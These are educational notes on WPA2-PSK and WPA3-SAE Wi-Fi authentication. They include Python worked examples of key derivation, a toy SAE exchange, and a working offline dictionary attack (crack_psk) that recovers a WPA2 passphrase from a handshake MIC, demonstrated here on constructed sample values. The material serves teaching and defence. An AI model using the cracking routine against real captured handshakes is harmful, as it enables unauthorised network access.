Wi-Fi Personal Authentication


  • 3 types of Wi-Fi authentication:
    • personal
      • pre-shared key (PSK): WPA/WPA2-Personal
      • Simultaneous Authentication of Equals (SAE): WPA3-Personal
    • open
    • enterprise

WPA2 Pre-Shared Key Authentication

Pre-shared key (PSK) is a wireless authentication mode in which a single passphrase, shared by everyone allowed on the network, is used to derive the master encryption key. Because one secret is shared by the group, it authenticates membership of the group, not an individual user or device.

  • pre-shared key (PSK) authentication uses a passphrase to derive the key from which the per-session encryption keys are generated
    • referred to as group authentication
      • every user and device shares the same secret
    • administrator configures a passphrase of 8-63 ASCII characters
      • passphrase is run through the PBKDF2 key-stretching function (4096 rounds of HMAC-SHA1, with the SSID as the salt) to produce a 256-bit key
        • usually displayed as a 64-character hex value
        • called the pairwise master key (PMK)
          • used in WPA2's four-way handshake, together with both MAC addresses and two random nonces, to derive the session keys (the pairwise transient key, PTK)
    • same secret must be configured on the access point and on each station
    • passphrase should be at least 14 characters long (8 is only the protocol minimum)
      • to mitigate the risk of offline cracking: anyone who captures a station's four-way handshake can test candidate passphrases against it without ever contacting the access point
      • because the SSID is the salt, a precomputed table only helps against networks that use a common SSID
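
The derivation above and the offline attack it enables, as an added worked example (this is not code from the original notes or from any vendor): PBKDF2 to PMK, PRF-384 to PTK, HMAC-SHA1 to the message-2 MIC, checked against the IEEE 802.11i Annex H.4 test vector, then a dictionary attack over a constructed capture. The SSID, MAC addresses, nonces, wordlist and the message-2 frame are constructed sample values; the frame builder emits only the EAPOL-Key fields the MIC covers and is not a general frame parser.

```python
import hashlib
import hmac

# IEEE 802.11i Annex H.4 test vector: passphrase "password", SSID "IEEE".
PMK_TEST_VECTOR = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"

# RSN information element for CCMP with the PSK AKM, as carried in message 2.
RSN_IE_CCMP_PSK = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes).
    This is the 64-hex-character psk that tools such as wpa_passphrase print."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2 passphrase must be 8-63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode(), 4096, 32)


def prf_384(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-384: HMAC-SHA1 in counter mode, first 48 bytes of output."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(3))
    return b"".join(blocks)[:48]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise transient key for CCMP (KCK | KEK | TK) from the four-way handshake inputs."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_384(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for descriptor version 2: HMAC-SHA1 over the EAPOL-Key frame
    (MIC field zeroed), truncated to 16 bytes."""
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, key_data: bytes = RSN_IE_CCMP_PSK) -> bytes:
    """Constructed EAPOL-Key message 2 (station -> AP) with a zeroed MIC field."""
    body = (b"\x02"                       # descriptor type: RSN
            + b"\x01\x0a"                 # key info: pairwise, MIC present, version 2
            + b"\x00\x10"                 # key length 16 (CCMP)
            + (1).to_bytes(8, "big")      # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, key IV, RSC, reserved
            + bytes(16)                   # MIC field, zero while the MIC is computed
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type EAPOL-Key


def simulate_capture(passphrase, ssid, ap_mac, sta_mac, anonce, snonce):
    """What a passive sniffer gets from one client join: message 2 and its MIC
    (the MACs and both nonces are sent in the clear as well)."""
    ptk = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    frame = build_msg2(snonce)
    return frame, eapol_mic(ptk[:16], frame)    # KCK = first 16 bytes of the PTK


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, frame, captured_mic, wordlist):
    """Offline dictionary attack: every candidate is checked with local PBKDF2 and
    HMAC work only, so the access point never sees, and cannot throttle, a guess."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:
            continue
        kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return candidate
    return None


# Constructed sample input, not a real capture.
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["short", "letmein123", "summer2024", "Welcome1!", "correct horse"]


def demo(secret: str = "summer2024"):
    """Join once with `secret`, then recover it from the capture with the wordlist."""
    frame, mic = simulate_capture(secret, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)
    return crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, frame, mic, WORDLIST)


if __name__ == "__main__":
    assert derive_pmk("password", "IEEE").hex() == PMK_TEST_VECTOR
    print("recovered passphrase:", demo())
```

The cost of each guess is one PBKDF2 run (4096 HMAC-SHA1 rounds) plus a few HMACs, and the attacker pays it on their own hardware, which is why passphrase length, not the handshake, is the only thing standing between a captured WPA2-Personal join and the key.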

WPA3 Personal Authentication

  • still uses a passphrase to authenticate stations
    • but changes the method by which this secret is used to agree session keys
    • scheme used is a Password Authenticated Key Exchange (PAKE)
  • Simultaneous Authentication of Equals (SAE) protocol replaces the PSK mechanism for creating the Pairwise Master Key (PMK)
    • 4-way handshake is still used after the PMK is established, but the PMK is now a fresh per-session value rather than a fixed function of the passphrase and SSID
    • SAE uses the Dragonfly handshake
      • a Diffie-Hellman style key agreement over an elliptic curve (or a finite-field group) in which the base point is a "password element" derived from the passphrase and both devices' MAC addresses; each side proves knowledge of the passphrase through a commit and confirm exchange
      • each exchange uses fresh random (ephemeral) values, so the session keys offer forward secrecy: recovering the passphrase later does not expose past sessions
    • a captured exchange gives the attacker no offline oracle
      • the values sent on the air are masked by the random values, so a candidate passphrase cannot be tested against a sniffed handshake with a brute force or dictionary attack
      • each guess instead requires a live exchange with the access point, which the access point can rate-limit, so a weak passphrase is still weak, just far more expensive to attack
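
A simplified Dragonfly commit/confirm exchange over a finite-field group, added here as a worked example (not code from the original notes and not a conforming SAE implementation): it shows both sides deriving the same PMK from the password element plus fresh random values, a wrong passphrase failing at the confirm step, and two runs with the same passphrase producing unrelated keys. Assumptions: a deterministically generated 128-bit safe prime stands in for the real 2048-bit MODP groups or NIST curves; the hunting-and-pecking loop, key-derivation labels, confirm message layout and MAC addresses are constructed for the demo; a seeded PRNG replaces the OS CSPRNG so the run is repeatable.

```python
import hashlib
import hmac
import random

_BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)

def is_probable_prime(n: int) -> bool:
    """Miller-Rabin with fixed small bases (adequate for the toy group sizes here)."""
    if n < 2 or any(n % b == 0 for b in _BASES):
        return n in _BASES
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for a in _BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def safe_prime(bits: int, seed: int = 2024):
    """Deterministic search for p = 2q + 1 with p and q prime (toy size, see lead-in)."""
    rng = random.Random(seed)
    while True:
        q = rng.getrandbits(bits - 1) | (1 << (bits - 2)) | 1
        if is_probable_prime(q) and is_probable_prime(2 * q + 1):
            return 2 * q + 1, q

P, Q = safe_prime(128)            # group prime and the order of the subgroup SAE works in
NBYTES = (P.bit_length() + 7) // 8

def password_element(password: str, mac_a: bytes, mac_b: bytes) -> int:
    """Hunting and pecking: hash password + both MACs + counter, square the result
    into the order-q subgroup, retry until it lands in range and is not the identity."""
    base = max(mac_a, mac_b) + min(mac_a, mac_b)
    for counter in range(1, 256):
        seed = hmac.new(base, password.encode() + bytes([counter]), hashlib.sha256).digest()
        x = int.from_bytes(seed[:NBYTES], "big")
        if not 1 < x < P:
            continue
        pe = pow(x, (P - 1) // Q, P)
        if pe > 1:
            return pe
    raise RuntimeError("no password element found")

def _b(n: int) -> bytes:
    return n.to_bytes(NBYTES, "big")

class Peer:
    def __init__(self, mac: bytes, peer_mac: bytes, password: str, rng: random.Random):
        self.pe = password_element(password, mac, peer_mac)
        self.rand = rng.randrange(2, Q)         # ephemeral secret, fresh per exchange
        self.mask = rng.randrange(2, Q)         # ephemeral blinding value
        self.scalar = (self.rand + self.mask) % Q
        self.element = pow(self.pe, Q - self.mask, P)   # PE^(-mask): hides rand and PE
        self.peer = self.kck = self.pmk = None
    def commit(self):
        return self.scalar, self.element        # the only values sent on the air
    def process_commit(self, peer_scalar: int, peer_element: int):
        if not (1 < peer_scalar < Q and 1 < peer_element < P) or pow(peer_element, Q, P) != 1:
            raise ValueError("invalid commit")  # range and subgroup checks on peer input
        if (peer_scalar, peer_element) == (self.scalar, self.element):
            raise ValueError("reflected commit")
        self.peer = (peer_scalar, peer_element)
        # PE^peer_scalar * peer_element = PE^peer_rand; raised to rand gives PE^(rand*peer_rand)
        ss = pow(pow(self.pe, peer_scalar, P) * peer_element % P, self.rand, P)
        keyseed = hashlib.sha256(_b(ss)).digest()
        ctx = _b((self.scalar + peer_scalar) % Q)
        self.kck = hmac.new(keyseed, b"kck" + ctx, hashlib.sha256).digest()
        self.pmk = hmac.new(keyseed, b"pmk" + ctx, hashlib.sha256).digest()
    def _confirm(self, a_scalar, a_element, b_scalar, b_element) -> bytes:
        msg = _b(a_scalar) + _b(a_element) + _b(b_scalar) + _b(b_element)
        return hmac.new(self.kck, msg, hashlib.sha256).digest()
    def confirm(self) -> bytes:
        return self._confirm(self.scalar, self.element, *self.peer)
    def verify(self, peer_confirm: bytes) -> bool:
        return hmac.compare_digest(self._confirm(*self.peer, self.scalar, self.element), peer_confirm)

def sae_exchange(sta_password: str, ap_password: str, seed: int = 7):
    """Commit + confirm between a station and an AP; returns (authenticated, sta PMK, ap PMK)."""
    rng = random.Random(seed)   # fixed seed so the demo repeats; real code uses secrets
    sta_mac, ap_mac = bytes.fromhex("66778899aabb"), bytes.fromhex("001122334455")
    sta = Peer(sta_mac, ap_mac, sta_password, rng)
    ap = Peer(ap_mac, sta_mac, ap_password, rng)
    ap.process_commit(*sta.commit())
    sta.process_commit(*ap.commit())
    ok = ap.verify(sta.confirm()) and sta.verify(ap.confirm())
    return ok, sta.pmk, ap.pmk
```

A sniffer sees two (scalar, element) pairs and two confirm hashes. Checking a candidate passphrase against them means recovering a peer's `rand` from `scalar` and `element`, which at real group sizes is a discrete logarithm; the only practical check is a live exchange with the access point, one guess per attempt. The confirm hashes depend on the shared secret, so the wrong-passphrase run below fails even though every message is well-formed.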

Info

  • The configuration interfaces for access points can use different labels for these methods:
    • may see WPA2-Personal and WPA3-SAE
    • rather than WPA2-PSK and WPA3-Personal
  • an access point can be configured for
    • WPA3 only
    • or with support for legacy WPA2 (WPA3-Personal Transition mode)
      • in transition mode WPA2 clients still authenticate with the PSK four-way handshake using the same passphrase, so that handshake can still be captured and attacked offline; WPA3-only removes this exposure once every client supports SAE